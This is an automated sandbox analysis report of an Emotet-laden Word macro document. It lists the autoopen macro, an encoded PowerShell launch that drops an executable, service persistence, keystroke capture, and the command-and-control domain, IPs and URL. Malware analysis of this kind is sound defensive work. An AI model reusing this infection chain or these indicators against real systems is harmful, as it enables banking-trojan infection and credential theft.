
Analysis Report Nuovo_documento_2019.09.20.doc

Overview

General Information

Joe Sandbox Version: 26.0.0 Aquamarine
Analysis ID: 961422
Start date: 20.09.2019
Start time: 13:28:47
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 9m 19s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Nuovo_documento_2019.09.20.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.evad.winDOC@18/52@1/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 90.5% (good quality ratio 87.9%)
  • Quality average: 82.2%
  • Quality standard deviation: 25.6%
HCA Information:
  • Successful, ratio: 84%
  • Number of executed functions: 133
  • Number of non-executed functions: 301
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | Report FP / FN | false | Emotet | malicious

Confidence

Strategy | Score | Range | Further Analysis Required?
Threshold | 5 | 0 - 5 | false


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts (1) | Windows Management Instrumentation (1) | Valid Accounts (1) | Valid Accounts (1) | Software Packing (2) | Input Capture (11) | System Time Discovery (1) | Remote File Copy (2) | Input Capture (11) | Data Encrypted (12) | Uncommonly Used Port (1)
Replication Through Removable Media | PowerShell (2) | Modify Existing Service (11) | Access Token Manipulation (1) | Disabling Security Tools (1) | Network Sniffing | Security Software Discovery (13) | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Remote File Copy (2)
Drive-by Compromise | Scripting (12) | New Service (12) | Process Injection (3) | Deobfuscate/Decode Files or Information (11) | Input Capture | System Service Discovery (1) | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Cryptographic Protocol (22)
Exploit Public-Facing Application | Execution through API (1) | System Firmware | New Service (12) | Scripting (12) | Credentials in Files | File and Directory Discovery (11) | Logon Scripts | Input Capture | Data Encrypted | Standard Non-Application Layer Protocol (2)
Spearphishing Link | Exploitation for Client Execution (3) | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information (2) | Account Manipulation | System Information Discovery (45) | Shared Webroot | Data Staged | Scheduled Transfer | Standard Application Layer Protocol (2)
Spearphishing Attachment | Command-Line Interface (11) | Modify Existing Service | New Service | Masquerading (2) | Brute Force | Query Registry (1) | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port
Spearphishing via Service | Service Execution (2) | Path Interception | Scheduled Task | Valid Accounts (1) | Two-Factor Authentication Interception | Process Discovery (2) | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port
Supply Chain Compromise | Third-party Software | Logon Scripts | Process Injection | Access Token Manipulation (1) | Bash History | Application Window Discovery (1) | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol
Trusted Relationship | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection (3) | Input Prompt | Remote System Discovery (1) | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption

Signature Overview



AV Detection:

Antivirus or Machine Learning detection for sample
Source: Nuovo_documento_2019.09.20.doc; Joe Sandbox ML: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\982.exe; Virustotal: Detection: 15%
Multi AV Scanner detection for submitted file
Source: Nuovo_documento_2019.09.20.doc; Virustotal: Detection: 22%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\982.exe; Code function: 7_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,7_2_0040207B
Source: C:\Users\user\982.exe; Code function: 7_2_00401F56 CryptGetHashParam,7_2_00401F56
Source: C:\Users\user\982.exe; Code function: 7_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,7_2_0040215A
Source: C:\Users\user\982.exe; Code function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,7_2_00401F75
Source: C:\Users\user\982.exe; Code function: 7_2_00401F11 CryptExportKey,7_2_00401F11
Source: C:\Users\user\982.exe; Code function: 7_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00401FFC
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,12_2_00401F75
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,12_2_00401FFC
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,12_2_0040207B
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_00401F56 CryptGetHashParam,12_2_00401F56
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,12_2_0040215A
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_00401F11 CryptExportKey,12_2_00401F11
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_1_00401F75 CryptDecodeObjectEx,LocalFree,12_1_00401F75

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic; DNS query: name: sabiosdelamor.co
Potential document exploit detected (performs HTTP gets)
Source: global traffic; TCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic; TCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic; TCP traffic: 192.168.1.16:49164 -> 149.167.86.174:990
IP address seen in connection with other malware
Source: Joe Sandbox View; IP Address: 149.167.86.174
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Connects to IPs without corresponding DNS lookups
Source: unknown; TCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknown; TCP traffic detected without corresponding DNS query: 181.164.8.25
Contains functionality to download additional files from the internet
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_00401383 InternetReadFile,12_2_00401383
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: sabiosdelamor.co
Urls found in memory or binary data
Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmp; String found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/
Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmp; String found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/n
Uses HTTPS
Source: unknown; Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49163

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\982.exe; Code function: 4_2_00403930 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,4_2_00403930

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Users\user\982.exe; Code function: 7_2_0040F504
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_0040F504

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\982.exe; Code function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,7_2_00401F75
Source: C:\Windows\System32\sortedwatched.exe; Code function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,12_2_00401F75

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0; Screenshot OCR: Enable Editing and Enable Content. Type: Microsoft Word Document
Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)
Source: Nuovo_documento_2019.09.20.doc; OLE, VBA macro line: If RecentFiles.Count > 3 Then
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\982.exe
Contains functionality to call native functions
Source: C:\Users\user\982.exe; Code function: 4_2_00522670 NtResumeThread,4_2_00522670
Source: C:\Users\user\982.exe; Code function: 4_2_00522630 NtWriteVirtualMemory,4_2_00522630
Source: C:\Users\user\982.exe; Code function: 4_2_005226D0 NtMapViewOfSection,4_2_005226D0
Source: C:\Users\user\982.exe; Code function: 4_2_005226B0 NtCreateSection,4_2_005226B0
Source: C:\Users\user\982.exe; Code function: 6_2_00492670 NtResumeThread,6_2_00492670
Source: C:\Users\user\982.exe; Code function: 6_2_00492630 NtWriteVirtualMemory,6_2_00492630
Source: C:\Users\user\982.exe; Code function: 6_2_004926D0 NtMapViewOfSection,6_2_004926D0
Source: C:\Users\user\982.exe; Code function: 6_2_004926B0 NtCreateSection,6_2_004926B0
Source: C:\Windows\System32\sortedwatched.exe; Code function: 9_2_005A2670 NtResumeThread,9_2_005A2670
Source: C:\Windows\System32\sortedwatched.exe; Code function: 9_2_005A2630 NtWriteVirtualMemory,9_2_005A2630
Source: C:\Windows\System32\sortedwatched.exe; Code function: 9_2_005A26D0 NtMapViewOfSection,9_2_005A26D0
Source: C:\Windows\System32\sortedwatched.exe; Code function: 9_2_005A26B0 NtCreateSection,9_2_005A26B0
Source: C:\Windows\System32\sortedwatched.exe; Code function: 11_2_005B2670 NtResumeThread,11_2_005B2670
Source: C:\Windows\System32\sortedwatched.exe; Code function: 11_2_005B2630 NtWriteVirtualMemory,11_2_005B2630
Source: C:\Windows\System32\sortedwatched.exe; Code function: 11_2_005B26D0 NtMapViewOfSection,11_2_005B26D0
Source: C:\Windows\System32\sortedwatched.exe; Code function: 11_2_005B26B0 NtCreateSection,11_2_005B26B0
Contains functionality to delete services
Source: C:\Users\user\982.exe; Code function: 7_2_0040F6D0 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,7_2_0040F6D0
Contains functionality to launch a process as a different user
Source: C:\Users\user\982.exe; Code function: 7_2_00401D2B CreateProcessAsUserW,CreateProcessW,7_2_00401D2B
Creates files inside the system directory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; File created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat
Creates mutexes
Source: C:\Windows\System32\sortedwatched.exe; Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\user\982.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\982.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
Source: C:\Windows\System32\sortedwatched.exe; Mutant created: \BaseNamedObjects\Global\M3C4E0000
Detected potential crypto function
Document contains an ObjectPool stream indicating possible embedded files or OLE objects
Source: Nuovo_documento_2019.09.20.doc; OLE indicator, ObjectPool: true
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Nuovo_documento_2019.09.20.doc; OLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentation; OLE, VBA macro: Module JIodCjfv, Function autoopen; Name: autoopen
Document contains embedded VBA macros
Source: Nuovo_documento_2019.09.20.doc; OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View; Dropped File: C:\Users\user\982.exe 8743FB2C992EE623779B119C5BB06F9A523E2F335B0E64B8E133C4867295CE3C
Found potential string decryption / allocating functions
Source: C:\Users\user\982.exe; Code function: String function: 0042922B appears 129 times
Source: C:\Users\user\982.exe; Code function: String function: 00429338 appears 52 times
PE file contains strange resources
Source: 982.exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 982.exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 982.exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\sortedwatched.exe; File read: C:\Windows\System32\drivers\etc\hosts
Yara signature match
Source: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.322151721.00400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000001.321515804.00400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.302707019.00493000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.323191242.005A3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.295966721.00400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.297316445.00523000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.982.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.982.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.1.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.sortedwatched.exe.5a3000.2.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.982.exe.523000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.982.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.982.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.982.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.982.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.982.exe.493000.2.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.sortedwatched.exe.5b3000.2.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.sortedwatched.exe.5b3000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.1.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.982.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.982.exe.523000.2.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.982.exe.493000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.sortedwatched.exe.5a3000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.1.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.1.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.982.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Classification label
Source: classification engine; Classification label: mal100.bank.evad.winDOC@18/52@1/3
Contains functionality to create services
Source: C:\Users\user\982.exe; Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0
Source: C:\Users\user\982.exe; Code function: OpenSCManagerW,_snwprintf,CreateServiceW,7_1_0040F7A0
Source: C:\Windows\System32\sortedwatched.exe; Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,12_2_0040F7A0
Contains functionality to enum processes or threads
Source: C:\Users\user\982.exe; Code function: 5_2_00401943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_00401943
Contains functionality to instantiate COM classes
Source: C:\Users\user\982.exe; Code function: 4_2_0041286F __EH_prolog3_GS,_memset,GetVersionExW,_malloc,_memset,_DebugHeapAllocator,_wcschr,CoInitializeEx,CoCreateInstance,4_2_0041286F
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\982.exe; Code function: 4_2_004190A2 LoadResource,LockResource,_malloc,GetSysColor,GetSysColor,GetSysColor,GetSysColor,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,StretchDIBits,SelectObject,DeleteDC,ReleaseDC,FreeResource,4_2_004190A2
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\982.exe; Code function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$ovo_documento_2019.09.20.doc
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user~1\AppData\Local\Temp\CVR81DD.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: Nuovo_documento_2019.09.20.doc; OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: Nuovo_documento_2019.09.20.doc; OLE document summary: title field not present or empty
Source: Nuovo_documento_2019.09.20.doc; OLE document summary: edited time not present or 0
Found command line output
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3!j.............3!j....L.,.L| jD......n$(&j...n....L| j.............7!j0..... jL.,.0j%.............$(&j.. j....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...........0j%.....A.{u,...............a.{u..0.....X...h.......Ul....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...................A.{u,...............a.{u..0.....X...h...$...bl....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...........0j%.....A.{u,...............a.{u..0.....X...h...$....l....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...................A.{u,...............a.{u..0.....X...h........l....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#...0j%.0...A.{u................a.{u..0.....X...h...d....l..................#.................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#.......0...A.{u................a.{u..0.....X...h...d....l..................#.......l.........zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......'...........A.{uL...............a.{u..0.....X...h...d....l..................'.......,.........zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......+...........A.{uL...............a.{u..0.....X...h...d....m..................+.......,.........zu........Jump to behavior
Might use command line argumentsShow sources
Source: C:\Users\user\982.exeCommand line argument: PB4_2_0042E6A0
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Sample is known by AntivirusShow sources
Source: Nuovo_documento_2019.09.20.docVirustotal: Detection: 22%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\982.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_5-2847
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod 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
Source: unknownProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknownProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknownProcess created: C:\Users\user\982.exe --4e722ada
Source: unknownProcess created: C:\Users\user\982.exe --4e722ada
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe' Jump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe' Jump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe --4e722adaJump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe --4e722adaJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exeJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385Jump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385Jump to behavior
